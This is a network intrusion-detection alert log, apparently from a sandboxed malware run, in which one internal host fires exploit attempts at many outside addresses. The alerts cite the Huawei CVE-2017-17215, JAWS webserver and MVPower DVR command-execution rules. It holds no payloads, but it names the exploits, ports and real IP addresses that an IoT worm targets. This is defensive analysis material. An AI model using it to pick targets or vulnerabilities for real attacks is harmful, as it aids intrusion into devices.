                            06/10/24-15:37:59.874568TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5782480192.168.2.13135.106.4.49
                            06/10/24-15:38:00.263049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755837215192.168.2.1341.109.88.228
                            06/10/24-15:38:02.234846TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3362480192.168.2.13169.200.159.28
                            06/10/24-15:38:00.258036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285237215192.168.2.13197.130.110.26
                            06/10/24-15:38:02.492497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623637215192.168.2.13197.115.124.164
                            06/10/24-15:38:02.507632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061837215192.168.2.13156.211.140.83
                            06/10/24-15:38:02.666292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452437215192.168.2.13197.151.209.193
                            06/10/24-15:38:00.193307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465237215192.168.2.1341.154.67.6
                            06/10/24-15:38:02.500887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405037215192.168.2.13156.155.61.239
                            06/10/24-15:38:00.234498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308437215192.168.2.13156.178.253.203
                            06/10/24-15:38:02.495196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187637215192.168.2.13156.66.48.9
                            06/10/24-15:38:02.677116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528437215192.168.2.13156.224.70.86
                            06/10/24-15:38:02.724796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276037215192.168.2.13197.28.22.183
                            06/10/24-15:38:02.651590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509637215192.168.2.13197.64.191.165
                            06/10/24-15:38:02.248692TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5795280192.168.2.13123.21.144.92
                            06/10/24-15:38:02.137030TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5954680192.168.2.135.5.59.135
                            06/10/24-15:38:02.150336TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5614480192.168.2.13124.126.246.197
                            06/10/24-15:37:59.992906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339437215192.168.2.13156.168.136.24
                            06/10/24-15:38:02.757283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443437215192.168.2.13156.248.183.47
                            06/10/24-15:38:02.754766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967637215192.168.2.13197.243.121.228
                            06/10/24-15:38:02.735960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760837215192.168.2.13156.1.86.198
                            06/10/24-15:38:02.199023TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5856480192.168.2.13111.183.120.0
                            06/10/24-15:37:59.769858TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3933880192.168.2.13193.5.227.125
                            06/10/24-15:38:02.237504TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4070280192.168.2.13146.240.196.221
                            06/10/24-15:38:00.164438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885037215192.168.2.13156.202.215.189
                            06/10/24-15:37:59.977354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087837215192.168.2.1341.140.184.247
                            06/10/24-15:38:00.134301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544037215192.168.2.13197.110.124.70
                            06/10/24-15:37:59.963760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678837215192.168.2.13197.91.250.61
                            06/10/24-15:38:02.672216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873037215192.168.2.13197.176.219.219
                            06/10/24-15:37:59.867470TCP2025883ET EXPLOIT MVPower DVR Shell UCE4941280192.168.2.1364.204.248.79
                            06/10/24-15:38:02.876052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700237215192.168.2.13197.80.176.118
                            06/10/24-15:37:59.952964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650837215192.168.2.13197.35.253.5
                            06/10/24-15:37:59.994517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980637215192.168.2.13197.99.205.156
                            06/10/24-15:38:00.186850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339637215192.168.2.1341.55.41.178
                            06/10/24-15:38:02.785256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085637215192.168.2.13197.82.79.198
                            06/10/24-15:37:59.968007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816037215192.168.2.13197.119.156.133
                            06/10/24-15:38:00.000374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252037215192.168.2.13156.225.196.18
                            06/10/24-15:38:02.301885TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4109080192.168.2.1361.254.239.187
                            06/10/24-15:38:02.650127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686637215192.168.2.13197.35.156.28
                            06/10/24-15:38:02.704450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085637215192.168.2.1341.213.236.151
                            06/10/24-15:38:02.725896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001237215192.168.2.13197.50.7.2
                            06/10/24-15:38:02.133348TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5034880192.168.2.1343.251.181.10
                            06/10/24-15:38:00.224996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506237215192.168.2.13197.141.161.30
                            06/10/24-15:38:02.494522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921237215192.168.2.1341.246.40.161
                            06/10/24-15:38:02.262402TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3460280192.168.2.13198.106.193.191
                            06/10/24-15:38:02.087778TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4668480192.168.2.1362.168.165.136
                            06/10/24-15:38:02.161006TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6003280192.168.2.13197.140.85.190
                            06/10/24-15:38:02.173963TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4816880192.168.2.13120.230.204.15
                            06/10/24-15:37:59.941006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351437215192.168.2.13156.78.13.161
                            06/10/24-15:38:02.319024TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5268680192.168.2.1351.122.138.133
                            06/10/24-15:38:02.148491TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5344280192.168.2.13115.50.164.90
                            06/10/24-15:38:00.213967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810637215192.168.2.13197.144.113.129
                            06/10/24-15:38:02.170905TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5720080192.168.2.1318.100.79.93
                            06/10/24-15:38:00.014911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898437215192.168.2.13156.122.137.98
                            06/10/24-15:38:02.490299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464837215192.168.2.13156.113.194.151
                            06/10/24-15:38:00.257346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295037215192.168.2.13156.146.151.12
                            06/10/24-15:38:02.143761TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5032080192.168.2.13121.144.172.154
                            06/10/24-15:38:02.719824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750237215192.168.2.1341.180.76.156
                            06/10/24-15:38:02.653315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729637215192.168.2.1341.208.114.199
                            06/10/24-15:37:59.978246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025637215192.168.2.1341.204.133.93
                            06/10/24-15:37:59.975667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653037215192.168.2.13156.231.3.185
                            06/10/24-15:38:02.858288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996237215192.168.2.13197.135.181.98
                            06/10/24-15:37:59.985167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781837215192.168.2.13156.159.10.140
                            06/10/24-15:38:02.324002TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4493480192.168.2.13129.212.137.97
                            06/10/24-15:38:00.007220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353837215192.168.2.1341.236.7.25
                            06/10/24-15:38:02.503623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660837215192.168.2.13156.212.201.147
                            06/10/24-15:38:02.488251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381237215192.168.2.13156.106.75.142
                            06/10/24-15:38:02.741975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395037215192.168.2.1341.157.185.2
                            06/10/24-15:38:02.642678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188837215192.168.2.13156.17.79.89
                            06/10/24-15:37:59.745869TCP2025883ET EXPLOIT MVPower DVR Shell UCE3786280192.168.2.13203.54.242.166
                            06/10/24-15:38:00.131221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810237215192.168.2.1341.41.194.38
                            06/10/24-15:38:00.214768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092637215192.168.2.13197.29.244.234
                            06/10/24-15:38:02.933795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283837215192.168.2.1341.70.30.5
                            06/10/24-15:38:00.251690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174037215192.168.2.13156.89.192.95
                            06/10/24-15:38:00.014210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636037215192.168.2.1341.241.121.248
                            06/10/24-15:38:02.667443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650437215192.168.2.13197.126.48.116
                            06/10/24-15:38:02.166379TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5438280192.168.2.1314.141.30.155
                            06/10/24-15:37:59.756001TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5343480192.168.2.1370.156.171.43
                            06/10/24-15:38:02.846884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376837215192.168.2.13156.122.197.14
                            06/10/24-15:38:02.110350TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3762280192.168.2.13207.225.19.48
                            06/10/24-15:38:02.692312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518637215192.168.2.1341.65.34.75
                            06/10/24-15:38:00.194715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740237215192.168.2.13197.153.65.158
                            06/10/24-15:38:00.227634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.1341.31.222.74
                            06/10/24-15:38:02.229897TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5656680192.168.2.1312.118.28.92
                            06/10/24-15:38:02.675728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381437215192.168.2.1341.205.27.222
                            06/10/24-15:38:00.015623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059037215192.168.2.1341.194.61.76
                            06/10/24-15:38:02.119966TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3865280192.168.2.1378.106.130.5
                            06/10/24-15:38:02.639134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793237215192.168.2.13156.242.158.116
                            06/10/24-15:38:02.680398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990237215192.168.2.1341.164.87.115
                            06/10/24-15:37:59.957760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105037215192.168.2.1341.41.95.201
                            06/10/24-15:38:00.270070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326237215192.168.2.1341.249.87.250
                            06/10/24-15:38:02.748143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895437215192.168.2.1341.242.83.117
                            06/10/24-15:38:02.821238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289037215192.168.2.1341.59.132.123
                            06/10/24-15:38:02.096951TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4421880192.168.2.13217.26.244.68
                            06/10/24-15:38:02.663241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425437215192.168.2.13156.225.226.13
                            06/10/24-15:38:00.200487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899037215192.168.2.13197.73.57.101
                            06/10/24-15:38:00.218890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736437215192.168.2.13156.60.167.234
                            06/10/24-15:38:00.182265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483037215192.168.2.13197.26.246.153
                            06/10/24-15:38:02.908641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897037215192.168.2.13156.202.174.167
                            06/10/24-15:38:02.761061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623037215192.168.2.13197.0.213.101
                            06/10/24-15:38:02.089268TCP2025883ET EXPLOIT MVPower DVR Shell UCE4024880192.168.2.1351.171.172.212
                            06/10/24-15:38:02.716092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297037215192.168.2.13156.28.97.254
                            06/10/24-15:38:02.785256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085637215192.168.2.13197.82.79.198
                            06/10/24-15:38:02.749574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522437215192.168.2.13197.93.109.120
                            06/10/24-15:38:02.729371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003837215192.168.2.1341.46.72.248
                            06/10/24-15:38:02.083879TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4586680192.168.2.13181.113.46.125
                            06/10/24-15:38:02.870630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680837215192.168.2.13156.103.106.207
                            06/10/24-15:37:59.963760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678837215192.168.2.13197.91.250.61
                            06/10/24-15:38:02.860487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408037215192.168.2.1341.39.148.204
                            06/10/24-15:38:00.250289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806237215192.168.2.13197.241.255.243
                            06/10/24-15:38:02.673517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819637215192.168.2.13197.217.153.165
                            06/10/24-15:37:59.956134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3841437215192.168.2.13156.167.122.41
                            06/10/24-15:38:02.202496TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4744280192.168.2.1396.134.106.53
                            06/10/24-15:37:59.867470TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4941280192.168.2.1364.204.248.79
                            06/10/24-15:38:02.643438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425237215192.168.2.13156.20.242.161
                            06/10/24-15:38:02.828946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533837215192.168.2.13197.51.133.84
                            06/10/24-15:38:00.207478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920237215192.168.2.13156.200.117.215
                            06/10/24-15:38:02.837956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148237215192.168.2.13156.161.132.25
                            06/10/24-15:38:00.133538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525237215192.168.2.1341.136.197.138
                            06/10/24-15:37:59.829282TCP2025883ET EXPLOIT MVPower DVR Shell UCE3506680192.168.2.1374.221.113.140
                            06/10/24-15:37:59.951337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.13197.123.58.130
                            06/10/24-15:37:59.927927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111437215192.168.2.13156.18.195.164
                            06/10/24-15:38:02.656592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3415437215192.168.2.13156.66.27.141
                            06/10/24-15:38:02.242403TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5306080192.168.2.13172.164.171.65
                            06/10/24-15:37:59.922412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911037215192.168.2.13156.143.243.166
                            06/10/24-15:37:59.937775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108837215192.168.2.13156.185.143.113
                            06/10/24-15:38:02.189767TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5166480192.168.2.13175.66.140.251
                            06/10/24-15:37:59.996136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044637215192.168.2.13197.226.229.29
                            06/10/24-15:38:02.241022TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5547080192.168.2.13223.191.85.169
                            06/10/24-15:38:02.316251TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3333080192.168.2.13216.190.189.185
                            06/10/24-15:38:02.701067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546837215192.168.2.1341.229.41.14
                            06/10/24-15:38:00.025563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044837215192.168.2.13156.11.232.27
                            06/10/24-15:37:59.797691TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3984280192.168.2.1313.159.171.238
                            06/10/24-15:38:02.658653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.13156.2.142.241
                            06/10/24-15:38:00.037730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009637215192.168.2.13156.175.16.45
                            06/10/24-15:37:59.959524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727237215192.168.2.1341.201.89.180
                            06/10/24-15:38:02.863237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764237215192.168.2.1341.14.234.212
                            06/10/24-15:38:00.171881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784437215192.168.2.13156.195.94.23
                            06/10/24-15:38:02.717243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3745637215192.168.2.13156.79.80.1
                            06/10/24-15:38:00.024162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236437215192.168.2.13197.238.227.229
                            06/10/24-15:38:02.252101TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3971680192.168.2.1341.163.180.55
                            06/10/24-15:38:02.162773TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3575080192.168.2.1381.247.181.180
                            06/10/24-15:38:02.251453TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4235880192.168.2.13100.127.78.32
                            06/10/24-15:38:02.313323TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3422880192.168.2.13177.204.177.37
                            06/10/24-15:38:00.237158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212437215192.168.2.1341.235.244.224
                            06/10/24-15:38:00.245474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392037215192.168.2.13156.244.109.56
                            06/10/24-15:38:02.682611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339437215192.168.2.13156.208.52.212
                            06/10/24-15:38:02.191670TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5528480192.168.2.13101.205.228.142
                            06/10/24-15:38:02.711502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687037215192.168.2.1341.91.70.189
                            06/10/24-15:38:02.498786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735837215192.168.2.13197.25.178.38
                            06/10/24-15:37:59.946836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348237215192.168.2.13156.82.1.213
                            06/10/24-15:38:02.641252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726237215192.168.2.1341.229.155.150
                            06/10/24-15:38:00.032756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250637215192.168.2.13197.235.137.220
                            06/10/24-15:38:00.244658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754037215192.168.2.1341.182.154.164
                            06/10/24-15:38:02.152274TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4888880192.168.2.13175.66.114.182
                            06/10/24-15:38:02.871465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846637215192.168.2.13197.29.159.134
                            06/10/24-15:38:00.019152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732037215192.168.2.13156.12.201.188
                            06/10/24-15:38:02.509056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322437215192.168.2.13156.103.216.158
                            06/10/24-15:37:59.860897TCP2025883ET EXPLOIT MVPower DVR Shell UCE5640080192.168.2.1376.87.100.69
                            06/10/24-15:37:59.793177TCP2025883ET EXPLOIT MVPower DVR Shell UCE5284280192.168.2.13181.232.47.252
                            06/10/24-15:38:02.699989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693237215192.168.2.1341.161.75.219
                            06/10/24-15:38:02.494045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588237215192.168.2.13197.129.137.220
                            06/10/24-15:38:00.216411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448237215192.168.2.1341.10.140.61
                            06/10/24-15:38:02.086431TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3503680192.168.2.1364.180.193.8
                            06/10/24-15:38:02.850206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053237215192.168.2.13156.21.120.143
                            06/10/24-15:37:59.961213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256437215192.168.2.13197.27.200.127
                            06/10/24-15:38:02.128087TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3728280192.168.2.13193.181.62.252
                            06/10/24-15:38:02.917908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713637215192.168.2.13197.51.204.222
                            06/10/24-15:38:02.772411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304837215192.168.2.13156.186.79.156
                            06/10/24-15:37:59.827151TCP2025883ET EXPLOIT MVPower DVR Shell UCE5138280192.168.2.13160.158.220.221
                            06/10/24-15:38:02.822383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427837215192.168.2.13197.207.208.126
                            06/10/24-15:38:02.512532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481637215192.168.2.13156.214.52.148
                            06/10/24-15:38:02.909928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442637215192.168.2.1341.223.106.15
                            06/10/24-15:38:00.236295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542837215192.168.2.13156.103.207.1
                            06/10/24-15:37:59.858870TCP2025883ET EXPLOIT MVPower DVR Shell UCE3441080192.168.2.13178.116.76.220
                            06/10/24-15:38:00.035608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189037215192.168.2.13197.253.99.100
                            06/10/24-15:38:02.156695TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5799680192.168.2.13181.74.252.245
                            06/10/24-15:38:02.849196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144037215192.168.2.13197.11.180.159
                            06/10/24-15:37:59.762945TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5013480192.168.2.13102.230.19.253
                            06/10/24-15:38:00.223242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004237215192.168.2.13197.42.26.190
                            06/10/24-15:38:02.143166TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4845880192.168.2.1324.64.193.46
                            06/10/24-15:38:02.167637TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3907880192.168.2.13131.34.203.87
                            06/10/24-15:38:02.488251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381237215192.168.2.13156.106.75.142
                            06/10/24-15:37:59.927028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306437215192.168.2.1341.251.69.196
                            06/10/24-15:38:00.038461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109237215192.168.2.13197.21.231.68
                            06/10/24-15:38:02.122707TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4704480192.168.2.1372.90.29.55
                            06/10/24-15:38:02.511832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016637215192.168.2.1341.124.203.218
                            06/10/24-15:38:02.774996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913837215192.168.2.13156.179.59.101
                            06/10/24-15:37:59.840660TCP2025883ET EXPLOIT MVPower DVR Shell UCE3390080192.168.2.1337.242.196.25
                            06/10/24-15:38:02.083314TCP2025883ET EXPLOIT MVPower DVR Shell UCE3583480192.168.2.1375.46.147.180
                            06/10/24-15:37:59.954562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399037215192.168.2.1341.196.189.226
                            06/10/24-15:37:59.767523TCP2025883ET EXPLOIT MVPower DVR Shell UCE6012680192.168.2.1388.157.63.21
                            06/10/24-15:37:59.998646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966237215192.168.2.13197.50.100.135
                            06/10/24-15:38:02.495196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187637215192.168.2.13156.66.48.9
                            06/10/24-15:38:02.825900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658837215192.168.2.13197.48.146.219
                            06/10/24-15:37:59.971341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725837215192.168.2.1341.170.34.101
                            06/10/24-15:38:00.224996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5506237215192.168.2.13197.141.161.30
